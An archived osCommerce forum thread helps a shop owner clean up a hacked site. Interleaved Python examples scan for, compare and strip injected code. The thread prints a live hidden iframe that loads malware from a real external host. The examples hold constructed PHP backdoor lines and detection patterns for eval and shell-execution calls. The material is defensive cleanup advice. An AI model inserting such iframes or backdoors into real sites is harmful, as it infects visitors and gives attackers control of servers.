
Security breach message


ogwinilo


When opening my site, the web browser displays the following message:

 

"This website has been reported as unsafe

www.herbalsa.com

 

We recommend that you do not continue to this website.

 

This website has been reported to Microsoft for containing threats to your computer that might reveal personal or financial information.

This website has been reported to contain the following threats:

Malicious software threat: This site contains links to viruses or other software programs that can reveal personal information stored or typed on your computer to malicious persons."

 

This is after installing an .htaccess patch and setting the permissions correctly, and now I can't open my products; it says products cannot be found, yet they are in the database. Only some of the new template installation changes are reflected on my site.

 

What could be the solution to these?

 

Thanks in advance

 

Felix


You may well have been hacked. It does not sound as though you took all the measures necessary to secure osc. I suggest you install the Site Monitor addon and use it to check whether there are any suspicious files on your site. You can also browse the osc directories for files that should not be there - particularly look for php files in the images directory, for example and open up some of the script (php) files to see whether there is a line at the top with the word 'eval' in it.

 

You can find details of all the measures needed to secure osc here. They all have to be done, and done on a site that has been cleaned of hacker files and code, and the database also needs to be checked for extra administrator accounts.

 

In case there is some innocent explanation for it, to do with the way you have set the .htaccess settings and any template you have installed, you still need to take all the necessary security measures and not just install an '.htaccess patch'

www.jyoshna.com. Currently using OsC with STS, Super Download Store, Categories Descriptons, Manufacturers Description, Individual Item Status, Infopages unlimited, Product Sort, Osplayer with flashmp3player, Product Tabs 2.1 with WebFx Tabpane and other bits and pieces including some I made myself. Many thanks to all whose contributions I have used!


When opening my site, the web browser displays the following message: "This website has been reported as unsafe"

Indeed. At the bottom of your index page is a hidden iframe that is mentioned as an attack site hosting malicious malware:

 

<iframe src="http:// jL . chura . pl / rc/ " style="display:none"></iframe>

 

See for example this page at Google

 

In your page:

 

</table>
<iframe src="http://as_above_without_spaces" style="display:none"></iframe>
</body>
</html>



Thanks for your valuable feedback.

I don't seem to locate:

</table>

<iframe src="http://as_above_without_spaces" style="display:none"></iframe>

</body>

</html>

 

Is it in the index.php file? When I find it, do I find it (I know it feels like a stupid question)?

 

Are the suggested add ons by Ben Nevis in this post sufficient to pick it up and deal with it?

 

Thanks again


I suppose you could ask in the Site Monitor thread for what sort of code changes it checks for when identifying suspicious files.

 

This might not be the only hack on your site though, so this is not the only 'it' that needs to be dealt with. The thread I referred you to has links to the various threads and posts for stopping various types of hacks on osc. There is a lot to do there, and none of it will work if you don't do the first step of either restoring your site and database from an unhacked backup, which can be difficult if you don't know what to look for in deciding whether the backup is 'clean' or not, or else identifying and removing all hacker code and files manually. Site Monitor can help with this but again you need to know what sort of code to look for, which it appears you don't, so you're in a bit of a catch-22 situation. All you can do is start, use Site Monitor either on your current site or from whatever backup you choose, look at and ask questions about any files it identifies, and try to get rid of the hacks. Then you will still have to do all the other things listed in the thread I referred you to.

 

The 'dealing with it' has to be done by you adding the addons and code changes, the changes and addons all together should secure your site to the best of knowledge of current exploits and preventing them.



I suppose you could ask in the Site Monitor thread for what sort of code changes it checks for when identifying suspicious files.

It looks for files that have been changed, dates last modified changes, and file size changes. It does not look for code.

 

The problem with Site Monitor, and it is really not a problem but it's just the way it works, is that if you install Site Monitor on a site that has already been hacked it assumes that the hacked code is correct.

 

You see, when you run Site Monitor for the first time you are telling it that what you now have is correct, and Site Monitor makes a database of the files then on your server at that time. It then checks your site when it runs against that database and reports any differences from then on.

 

By installing site monitor on a hacked site you are not fixing anything and site monitor will not report anything out of the ordinary until something changes again.

 

You should only install site monitor on a fresh install, and run it daily to quickly find out that you have been compromised. It will not prevent you from being hacked. That comes from other add ons.

Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

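The baseline-and-compare behaviour Mark describes above, written out as a Python example added here (it is not Site Monitor's code and was not posted in the thread). The shop tree it builds, the file contents and the iframe URL are constructed for the demo. Site Monitor, as described, keys on size and date-modified; this example also records a SHA-256 hash, because size and mtime can be faked by padding a file and touching it, and the comparison relies on the hash. The demo runs the same intrusion twice: once against a baseline taken from the clean tree, and once against a baseline taken after the hack, which is the case Mark warns about.

```python
import hashlib
import os
import tempfile

# Constructed mini shop tree used as demo input. Paths and contents are
# assumptions made for this example, not files taken from the thread.
SAMPLE_TREE = {
    "index.php": "<?php require('includes/application_top.php'); ?>\n"
                 "<html><body>shop front</body></html>\n",
    "includes/footer.php": "<?php echo 'footer'; ?>\n",
}
INJECTED_IFRAME = ('<iframe src="http://example.invalid/rc/" '
                   'style="display:none"></iframe>\n')
DROPPED_BACKDOOR = "<?php eval($_POST['x']); ?>\n"


def write_tree(root, files):
    """Create files (relative path -> text) under root."""
    for rel, content in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def snapshot(root):
    """Baseline: size, mtime and SHA-256 of every file under root.

    Size and date-modified can both be faked by an attacker (pad the file,
    then touch it); the hash cannot, so compare() uses the hash.
    """
    baseline = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            st = os.stat(full)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            baseline[rel] = {"size": st.st_size,
                             "mtime": int(st.st_mtime),
                             "sha256": digest}
    return baseline


def compare(baseline, current):
    """Files added, removed or changed relative to the baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(rel for rel in set(baseline) & set(current)
                      if baseline[rel]["sha256"] != current[rel]["sha256"])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """The same intrusion seen from a clean baseline and from a late one."""
    with tempfile.TemporaryDirectory() as root:
        write_tree(root, SAMPLE_TREE)
        clean_baseline = snapshot(root)          # taken on the fresh install

        # Intrusion: hidden iframe appended to index.php, PHP dropped in images/
        with open(os.path.join(root, "index.php"), "a", encoding="utf-8") as fh:
            fh.write(INJECTED_IFRAME)
        write_tree(root, {"images/thumb.php": DROPPED_BACKDOOR})

        after_hack = snapshot(root)
        from_clean = compare(clean_baseline, after_hack)
        # Baseline taken only now: the hacked state becomes "correct" and the
        # next run has nothing to report until something changes again.
        from_late = compare(after_hack, snapshot(root))
        return from_clean, from_late


if __name__ == "__main__":
    seen_from_clean, seen_from_late = demo()
    print("clean baseline reports:", seen_from_clean)
    print("late baseline reports: ", seen_from_late)
```

The first result names the modified index.php and the new images/thumb.php; the second is empty in every bucket, which is exactly why a baseline must come from a fresh install and not from the site as found.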

It looks for files that have been changed, dates last modified changes, and file size changes. It does not look for code.

 

 

According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.



According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

 

 

Truly humbled and appreciative of your input. I'm busy with those installs. I feel there is still a long way to go but will keep you posted.

However, and I don't know if this is associated with this, but when I open the site on my mobile phone, I get:

'My SQL Error!'

The error returned was:
Table 'statistics' is marked as crashed and should be repaired
Error Number 1194
SELECT * FROM statistics
WHERE ip='196.207.40.238'


According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

Specifically, apart from changed and added files it looks for base64_decode and iframes. This can certainly be useful in identifying possibly hacked files even if it is run after hacking has taken place and the original date/timestamps and list of genuine files are unknowns. It does however have to be said that backdoors can be opened with files that don't contain either of these, and such files, even if not genuine osc files, won't be discovered simply by using Site Monitor if it is run for the first time, after hacking has already taken place.


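The checks recommended in the first reply (PHP files under the images directory, a line calling 'eval') and the indicators the post above says Site Monitor 1.8 looks for (base64_decode and iframes), put together as a Python scanner. This is an example added here, not Site Monitor's code and not anything posted in the thread. The three indicators from the thread are kept; the decoder, command-execution and create_function patterns are further constructs commonly seen in PHP web shells, added for this example. The sample tree and its contents are constructed: it includes a legitimate NuSOAP-style eval (suspect but not infected, as the thread later concludes) and a backdoor that uses none of the indicators, to show the limitation the post above points out.

```python
import os
import re
import tempfile

# Indicators. "eval", "base64_decode" and the hidden iframe are the ones named
# in the thread; the remaining entries are further PHP constructs commonly seen
# in web shells, added for this example.
INDICATORS = {
    "eval": re.compile(r"\beval\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "hidden iframe": re.compile(r"<iframe\b[^>]*display\s*:\s*none", re.I),
    "decoder chain": re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\("),
    "command execution": re.compile(
        r"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\("),
    "create_function": re.compile(r"\bcreate_function\s*\("),
}
SCRIPT_EXTENSIONS = (".php", ".php3", ".php4", ".php5", ".phtml")


def scan(root, indicators=INDICATORS):
    """Return {relative path: [reasons]} for every file matching an indicator."""
    findings = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            reasons = []
            # Rule from the first reply: PHP has no business under images/
            if rel.startswith("images/") and name.lower().endswith(SCRIPT_EXTENSIONS):
                reasons.append("php file under images/")
            with open(full, "rb") as fh:
                text = fh.read().decode("latin-1")  # lossless; we only pattern-match
            reasons.extend(label for label, rx in indicators.items() if rx.search(text))
            if reasons:
                findings[rel] = reasons
    return findings


# Constructed sample tree; paths and contents are assumptions made for the demo.
SAMPLE_TREE = {
    # hidden iframe appended after </html>, as in the thread
    "index.php": "<?php require('includes/application_top.php'); ?>\n"
                 "<html><body>shop front</body></html>\n"
                 '<iframe src="http://example.invalid/rc/" style="display:none"></iframe>\n',
    # dropper: PHP under images/, eval of a base64 payload
    "images/logo.php": "<?php eval(base64_decode('ZWNobyAxOw==')); ?>\n",
    # legitimate use of eval (NuSOAP builds a proxy class): suspect, not infected
    "includes/classes/nusoap.php":
        "<?php class nusoap_client {\n"
        "  function getProxy() { $evalStr = $this->_getProxyClassCode(1); eval($evalStr); }\n"
        "}\n",
    # ordinary language file
    "includes/languages/english/ok.php": "<?php define('HEADER_TITLE_TOP', 'Top'); ?>\n",
    # backdoor that uses none of the indicators: the function name is assembled
    # at run time, so a search for eval/base64_decode/iframe walks straight past it
    "includes/modules/cache.php":
        "<?php $s = 'sys' . 'tem'; if (isset($_REQUEST['f'])) { $s($_REQUEST['f']); } ?>\n",
}


def demo():
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_TREE.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan(root)


if __name__ == "__main__":
    for path, why in sorted(demo().items()):
        print(f"{path}: {', '.join(why)}")
```

Run against a downloaded copy of the site, every hit still has to be opened and read: nusoap.php is flagged for the same reason a real dropper is. The file that is not flagged is the more important lesson; pattern scanning finds known tricks, and only a comparison against a known-good file set finds the rest.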

According to the contribution information, code to check for hacker code was added in version 1.8 of Site Monitor. It certainly does now flag up suspect files, and does not only look for changed files.

You're right. It does, because I didn't read the history or dig deeper into it when I first looked at it. My mistake.


On installing the Site Monitor, I get the following results on checking for hacked files:

Manually Check for Hacked Files
Check all files for known hacker type code. Found files are suspect but not necessarily infected

Checked 103 directories containing a total of 634 files. Skipped 386 files. 9 suspected hacked files found.

Hacked Files Found
php.ini
admin/administrators.php
admin/login.php
admin/sitemonitor_admin.php
admin/sitemonitor_configure_setup.php
admin/includes/classes/nusoap.php
includes/sts_template.html
includes/classes/nusoap.php
includes/modules/payment/paypal_standard.php

 

Is there a tool to spot and remove the corrupted aspects/codes in these?

What should I do?

 

Thanks

 

Felix



Short answer - no. You have to open them up and look at them. They might or might not be safe, I would suspect at least some of them probably aren't. If you only just installed Site Monitor it seems a bit unlikely it would have been immediately hacked. You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there. If you find such code, post the section containing it here and someone should be able to tell you whether it's a hack or not. Most probably it will be.



And if your admin directory is called admin, you'd better change it quick. See the links in the thread I referred you to in my post of 4th Jan, in particular the 'How to secure your site' thread.



You will be looking for any inserted code calling the 'eval' function, or with <iframe> tags you didn't put there.

The iframe is still there at this moment (added spaces around dots in url) at the bottom of the HTML code (application_bottom.php? includes/footer.php?, index.php?):

<table width="780" align="center"  cellpadding="0" cellspacing="0">
 <tr> 
   <td><div align="center" class="style1"></div></td>
 </tr>
</table>
<iframe src="http:// jL . chura . pl /rc/" style="display:none"></iframe>
</body>
</html>

 

But at least the admin section is secured with an .htaccess.



 

Appreciate your clarity. Will do.

By the way, can I install IP Trap via the cPanel's File Manager or it strictly must be through FTP?

 

Regards

 

Felix

(South Africa)



Of the nine possibly hacked files, I've managed to look at 4. Please look at the following code to see if my suspicions of infection are founded.

 

Found the following codes suspected to be hacks:

 

1. At the bottom of login.php:

</td>
</tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

2. Also at the bottom of admin/sitemonitor_admin.php:

<!-- END MANUALLY CHECK FOR HACKED FILES -->

</table></td>
<!-- body_text_eof //-->
</tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

3. Also at the bottom of admin/sitemonitor_configure_setup.php:

<!-- footer //-->
<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>
<!-- footer_eof //-->
<br>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
</body>
</html>
<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

4. The admin/includes/classes/nusoap.php file is too big, but I managed to extract the following code:

    }
    // eval the class
    eval($evalStr);
    // instantiate proxy object
    eval("\$proxy = new nusoap_proxy_$r('');");
    // transfer current wsdl data to the proxy thereby avoiding parsing the wsdl twice
    $proxy->endpointType = 'wsdl';

/**
* dynamically creates proxy class code
*
* @return string PHP/NuSOAP code for the proxy class
* @access private
*/
function _getProxyClassCode($r) {
    $this->debug("in getProxy endpointType=$this->endpointType");
    $this->appendDebug("wsdl=" . $this->varDump($this->wsdl));
    if ($this->endpointType != 'wsdl') {
        $evalStr = 'A proxy can only be created for a WSDL client';
        $this->setError($evalStr);
        $evalStr = "echo \"$evalStr\";";
        return $evalStr;
    }
    if ($this->endpointType == 'wsdl' && is_null($this->wsdl)) {
        $this->loadWSDL();
        if ($this->getError()) {
            return "echo \"" . $this->getError() . "\";";
        }
    }
    $evalStr = '';
    foreach ($this->operations as $operation => $opData) {
        if ($operation != '') {
            // create param string and param comment string
            if (sizeof($opData['input']['parts']) > 0) {
                $paramStr = '';
                $paramArrayStr = '';
                $paramCommentStr = '';
                foreach ($opData['input']['parts'] as $name => $type) {
                    $paramStr .= "\$$name, ";
                    $paramArrayStr .= "'$name' => \$$name, ";
                    $paramCommentStr .= "$type \$$name, ";
                }
                $paramStr = substr($paramStr, 0, strlen($paramStr)-2);
                $paramArrayStr = substr($paramArrayStr, 0, strlen($paramArrayStr)-2);
                $paramCommentStr = substr($paramCommentStr, 0, strlen($paramCommentStr)-2);
            } else {
                $paramStr = '';
                $paramArrayStr = '';
                $paramCommentStr = 'void';
            }
            $opData['namespace'] = !isset($opData['namespace']) ? 'http://testuri.com' : $opData['namespace'];
            $evalStr .= "// $paramCommentStr
function " . str_replace('.', '__', $operation) . "($paramStr) {
\$params = array($paramArrayStr);
return \$this->call('$operation', \$params, '".$opData['namespace']."', '".(isset($opData['soapAction']) ? $opData['soapAction'] : '')."');
}
";
            unset($paramStr);
            unset($paramCommentStr);
        }
    }
    $evalStr = 'class nusoap_proxy_'.$r.' extends nusoap_client {
'.$evalStr.'
}';
    return $evalStr;
}

 

 

Please suggest appropriate course of action in these cases

 

Thanks a great deal

 

Felix


Thanx for the response. Just to confirm, would you suggest I remove them?

What I would do is ask myself:

 

"How many add ons have I added to this install?"

"How long will it take me to reinstall them if I wipe my site and install fresh?"

"Do I have backup files known to be good prior to being hacked the first time? (Do I even know the first time I was hacked?)"

"Do I have the skills to risk doing a manual clean of the files and go back live?"

 

First choice is going to be wipe the site and start over, not putting it live on the internet until all security mods have been installed.

Second is going to be wipe the site and reinstall from a good backup.

And only if I have no other choice would I manually clean the files..

 

If I had to do the latter I would completely remove the site from access. Download all files to my local hard drive. Do a search for iframes with whatever means I have available to me, and delete them all.

 

Then, take a list of filenames from a stock OSC and note all files that are a part of the stock osc. Note any files that are a part of any add-on I installed. Any remaining files should be deleted.

 

Wipe the site clean. This step is really important!

 

Finally, upload the site files and start testing, all the while having access to the site restricted to you only.

 

 

Is that what you were hoping for?

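The manual-clean route Mark lays out above (download everything, search out the iframes, keep only files that belong to stock osC or to an installed add-on, delete the rest), as a Python example added here; it is not code from the thread or from osCommerce. The stock and add-on manifests are constructed stand-ins: real ones would be the file lists from the stock osC archive and from each add-on package you installed. The sample tree, its contents and the iframe URL are likewise constructed for the demo.

```python
import os
import re
import tempfile

# One injected hidden-iframe element on its own line, including the line break,
# so that removing it leaves no blank line behind.
HIDDEN_IFRAME = re.compile(
    r"[ \t]*<iframe\b[^>]*display\s*:\s*none[^>]*>\s*</iframe>[ \t]*\r?\n?", re.I)


def list_files(root):
    """Relative paths of every file under root, forward-slash separated."""
    present = set()
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            rel = os.path.relpath(os.path.join(dirpath, name), root)
            present.add(rel.replace(os.sep, "/"))
    return present


def classify(present, stock, addons):
    """Split the files on disk into stock, add-on, unknown and missing."""
    return {
        "stock": sorted(present & stock),
        "addon": sorted((present & addons) - stock),
        "unknown": sorted(present - stock - addons),  # delete candidates
        "missing": sorted(stock - present),           # expected but absent
    }


def strip_hidden_iframes(text):
    """Remove injected hidden iframes; returns (cleaned text, count removed)."""
    return HIDDEN_IFRAME.subn("", text)


# Constructed manifests and tree; names are assumptions made for the demo.
STOCK_MANIFEST = {"index.php", "login.php", "includes/footer.php",
                  "includes/application_bottom.php", "admin/login.php"}
ADDON_MANIFEST = {"admin/sitemonitor_admin.php",
                  "admin/sitemonitor_configure_setup.php"}
SAMPLE_TREE = {
    "index.php": "<html><body>\n<table></table>\n"
                 '<iframe src="http://example.invalid/rc/" style="display:none"></iframe>\n'
                 "</body>\n</html>\n",
    "login.php": "<?php require('includes/application_top.php'); ?>\n",
    "includes/footer.php": "<?php echo 'footer'; ?>\n",
    "admin/sitemonitor_admin.php": "<?php /* add-on */ ?>\n",
    "images/logo.php": "<?php eval($_POST['x']); ?>\n",   # neither stock nor add-on
}


def demo():
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_TREE.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        report = classify(list_files(root), STOCK_MANIFEST, ADDON_MANIFEST)
        with open(os.path.join(root, "index.php"), encoding="utf-8") as fh:
            cleaned, removed = strip_hidden_iframes(fh.read())
        return report, cleaned, removed


if __name__ == "__main__":
    report, cleaned, removed = demo()
    for bucket, paths in report.items():
        print(f"{bucket}: {paths}")
    print(f"removed {removed} hidden iframe(s); index.php is now:\n{cleaned}")
```

Two cautions when using this for real: the "unknown" bucket will also contain your own template files and anything you wrote yourself, so read the list before deleting; and stripping the iframe from a stock file only removes the one payload you know about, so where a stock copy exists, replacing the file is safer than editing it, which is why Mark puts the manual clean last.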


Great stuff, thanks a lot


Great stuff, thanks a lot

 

I am trying to delete all the iframe codes manually using a notepad, I save the changes, but the next time I open the document, it's not deleted. Is there a special way I can delete these?


1, 2, and 3 are definite hacks - it's the same code that Jan Zonjee already pointed out. nusoap.php isn't a standard osc2.2 file that I'm aware, but it does not appear to be hacker code. In another thread someone said it's a CRE secure payment module. CRE is an osc fork - is that what you are using by any chance? Anyway if you don't use that module you can remove it.

 

As Mark said, the best thing is to start again from a believed clean backup, and install Site Monitor again to check the backup.



I am trying to delete all the iframe codes manually using a notepad, I save the changes, but the next time I open the document, it's not deleted. Is there a special way I can delete these?

So, you are working with a local copy of the file. You know its location on your hard disk. You open it. Change it. And save it. Any errors yet?

 

No? Ok, open it. Did it revert back to the original code? Yes? Do a virus scan on your local machine.

 

 

Is your shop on your local machine by chance? Were you running your shop on the internet on your local machine? Windows? If the answer to this is yes, then you seriously need to consider doing a factory restore on your local machine. The hacker most likely put code deep in your machine where you will never find it and thus you will never fix this problem.



Wow! This is hectic. Thanks for the tips. will do.

Who would do such things, this is amazing


Archived

This topic is now archived and is closed to further replies.
